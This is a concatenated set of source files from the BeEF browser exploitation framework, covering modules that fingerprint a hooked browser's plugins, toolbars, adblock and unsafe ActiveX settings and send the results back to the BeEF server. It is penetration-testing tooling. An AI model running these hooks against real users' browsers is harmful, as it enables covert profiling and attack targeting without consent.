authors: ["wade"]
target:
user_notify: ["All"] |
Ruby | beef/modules/browser/detect_popup_blocker/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_popup_blocker < BeEF::Core::Command
def post_execute
content = {}
content['popup_blocker_enabled'] = @datastore['popup_blocker_enabled']
save content
end
end |
JavaScript | beef/modules/browser/detect_quicktime/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = (beef.browser.hasQuickTime())? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "quicktime="+result);
}); |
YAML | beef/modules/browser/detect_quicktime/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_quicktime:
enable: true
category: "Browser"
name: "Detect QuickTime"
description: "This module will check if the browser has Quicktime support."
authors: ["bcoles"]
target:
working: ["All"] |
Ruby | beef/modules/browser/detect_quicktime/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_quicktime < BeEF::Core::Command
def post_execute
content = {}
content['quicktime'] = @datastore['quicktime']
save content
end
end |
JavaScript | beef/modules/browser/detect_realplayer/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = ( beef.browser.hasRealPlayer() )? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "realplayer="+result);
}); |
YAML | beef/modules/browser/detect_realplayer/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_realplayer:
enable: true
category: "Browser"
name: "Detect RealPlayer"
description: "This module will check if the browser has RealPlayer support."
authors: ["gcattani"]
target:
working: ["All"] |
Ruby | beef/modules/browser/detect_realplayer/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_realplayer < BeEF::Core::Command
def post_execute
content = {}
content['realplayer'] = @datastore['realplayer']
save content
end
end |
JavaScript | beef/modules/browser/detect_silverlight/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = (beef.browser.hasSilverlight())? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "silverlight="+result);
}); |
YAML | beef/modules/browser/detect_silverlight/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_silverlight:
enable: true
category: "Browser"
name: "Detect Silverlight"
description: "This module will check if the browser has Silverlight support."
authors: ["bcoles"]
target:
working: ["ALL"] |
Ruby | beef/modules/browser/detect_silverlight/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_silverlight < BeEF::Core::Command
def post_execute
content = {}
content['silverlight'] = @datastore['silverlight']
save content
end
end |
JavaScript | beef/modules/browser/detect_simple_adblock/command.js | // Copyright (c) 2006-2023Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
if (document.getElementById('adblock_img')) {
return "Img already created";
}
var img = new Image();
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.src = 'http://simple-adblock.com/adblocktest/files/adbanner.gif';
img.id = 'adblock_img';
img.setAttribute("attr","start");
img.onerror = function() {
this.setAttribute("attr","error");
};
img.onload = function() {
this.setAttribute("attr","load");
};
document.body.appendChild(img);
setTimeout(function() {
var img = document.getElementById('adblock_img');
if (img.getAttribute("attr") == "error") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock returned an error');
} else if (img.getAttribute("attr") == "load") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is disabled or not installed');
} else if (img.getAttribute("attr") == "start") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is enabled');
};
document.body.removeChild(img);
}, 10000);
}); |
YAML | beef/modules/browser/detect_simple_adblock/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_simple_adblock:
enable: true
category: "Browser"
name: "Detect Simple Adblock"
description: "This module checks if the Simple Adblock module is active."
authors: ["sussurro"]
target:
working: ["IE"]
not_working: ["All"] |
Ruby | beef/modules/browser/detect_simple_adblock/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_simple_adblock < BeEF::Core::Command
def post_execute
content = {}
content['simple_adblock'] = @datastore['simple_adblock'] unless @datastore['simple_adblock'].nil?
save content
end
end |
JavaScript | beef/modules/browser/detect_toolbars/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var toolbar_ua = new Array (
new Array (" Alexa Toolbar", " Alexa"),
new Array (" AskTbS-PV", " Ask"),
new Array (" BRI", " Bing"),
new Array (" GTB", " Google"),
new Array (" SU ", " Stumble Upon")
)
var toolbar_id = new Array (
new Array ("AlexaCustomScriptId", " Alexa")
)
var result = '';
var separator = ", ";
// CHECK USER-AGENT
for (var i = 0; i < toolbar_ua.length; i++) {
var agentRegex = new RegExp( toolbar_ua[i][0], 'g' );
if ( agentRegex.exec(navigator.userAgent) ) {
result += toolbar_ua[i][1] + separator;
}
}
// CHECK ELEMENT ID (DOM)
for (var i = 0; i < toolbar_id.length; i++) {
var element = document.getElementById( toolbar_id[i][0] );
if ( typeof(element) != 'undefined' && element != null ) {
result += toolbar_id[i][1] + separator;
}
}
// ENDING
if ( result != '' ) {
result = result.slice(0, -separator.length);
} else if ( result == '' ) {
result = " no toolbars detected";
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "toolbars="+result);
}); |
YAML | beef/modules/browser/detect_toolbars/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Detect_toolbars:
enable: true
category: "Browser"
name: "Detect Toolbars"
description: "Detects which browser toolbars are installed."
authors: ["gcattani"]
target:
working: ["All"] |
Ruby | beef/modules/browser/detect_toolbars/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_toolbars < BeEF::Core::Command
def post_execute
content = {}
content['toolbars'] = @datastore['toolbars']
save content
end
end |
JavaScript | beef/modules/browser/detect_unity/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var hasUnity = function() {
// Internet Explorer
if ( beef.browser.isIE() ) {
try {
var unity_test = new ActiveXObject('UnityWebPlayer.UnityWebPlayer.1');
} catch (e) { }
if ( unity_test ) {
return true;
}
// Not Internet Explorer
} else if ( navigator.mimeTypes && navigator.mimeTypes["application/vnd.unity"] ) {
if ( navigator.mimeTypes["application/vnd.unity"].enabledPlugin &&
navigator.plugins &&
navigator.plugins["Unity Player"] ) {
return true;
}
}
return false;
}
if ( hasUnity() ) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is enabled");
if ( !beef.browser.isIE() ) {
var unityRegex = /Unity Web Player version (.*). \(c\)/g;
var match = unityRegex.exec(navigator.plugins["Unity Player"].description);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity version = "+ match[1]);
}
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is not enabled");
}
}); |
YAML | beef/modules/browser/detect_unity/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Detect_unity:
enable: true
category: "Browser"
name: "Detect Unity Web Player"
description: "Detects Unity Web Player."
authors: ["gcattani"]
target:
working: ["All"] |
Ruby | beef/modules/browser/detect_unity/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_unity < BeEF::Core::Command
def post_execute
content = {}
content['unity'] = @datastore['unity']
save content
end
end |
JavaScript | beef/modules/browser/detect_unsafe_activex/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var unsafe = true;
var result = "";
var test;
try {
test = new ActiveXObject("WbemScripting.SWbemLocator");
} catch (e) {
unsafe = false;
}
test = null;
if (unsafe) {
result = "Browser is configured for unsafe ActiveX";
} else {
result = "Browser is NOT configured for unsafe ActiveX";
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "unsafe_activex="+result);
}); |
YAML | beef/modules/browser/detect_unsafe_activex/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_unsafe_activex:
enable: true
category: "Browser"
name: "Detect Unsafe ActiveX"
description: "This module will check if IE has been insecurely configured. It will test if the option \"Initialize and script ActiveX controls not marked as safe for scripting\" is enabled.<br /><br />The setting can be found in: Tools Menu -> Internet Options -> Security -> Custom level -> \"Initialize and script ActiveX controls not marked as safe for scripting\""
authors: ["wade", "bcoles"]
target:
user_notify: ["IE"]
not_working: ["All"] |
Ruby | beef/modules/browser/detect_unsafe_activex/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_unsafe_activex < BeEF::Core::Command
def post_execute
content = {}
content['unsafe_activex'] = @datastore['unsafe_activex']
save content
end
end |
JavaScript | beef/modules/browser/detect_vlc/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = ( beef.browser.hasVLC() )? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "vlc="+result);
}); |
YAML | beef/modules/browser/detect_vlc/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_vlc:
enable: true
category: "Browser"
name: "Detect VLC"
description: "This module will check if the browser has VLC plugin."
authors: ["nbblrr"]
target:
working: ["IE", "FF", "C"] |
Ruby | beef/modules/browser/detect_vlc/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_vlc < BeEF::Core::Command
def post_execute
content = {}
content['vlc'] = @datastore['vlc']
save content
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.vlc', Regexp.last_match(1)) if @datastore['results'] =~ /^vlc=(Yes|No)/
end
end |
JavaScript | beef/modules/browser/detect_wmp/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = ( beef.browser.hasWMP() )? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "wmp="+result);
}); |
YAML | beef/modules/browser/detect_wmp/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_wmp:
enable: true
category: "Browser"
name: "Detect Windows Media Player"
description: "This module will check if the browser has the Windows Media Player plugin installed."
authors: ["gcattani"]
target:
working: ["All"] |
Ruby | beef/modules/browser/detect_wmp/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_wmp < BeEF::Core::Command
def post_execute
content = {}
content['wmp'] = @datastore['wmp']
save content
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.wmp', Regexp.last_match(1)) if @datastore['results'] =~ /^wmp=(Yes|No)/
end
end |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.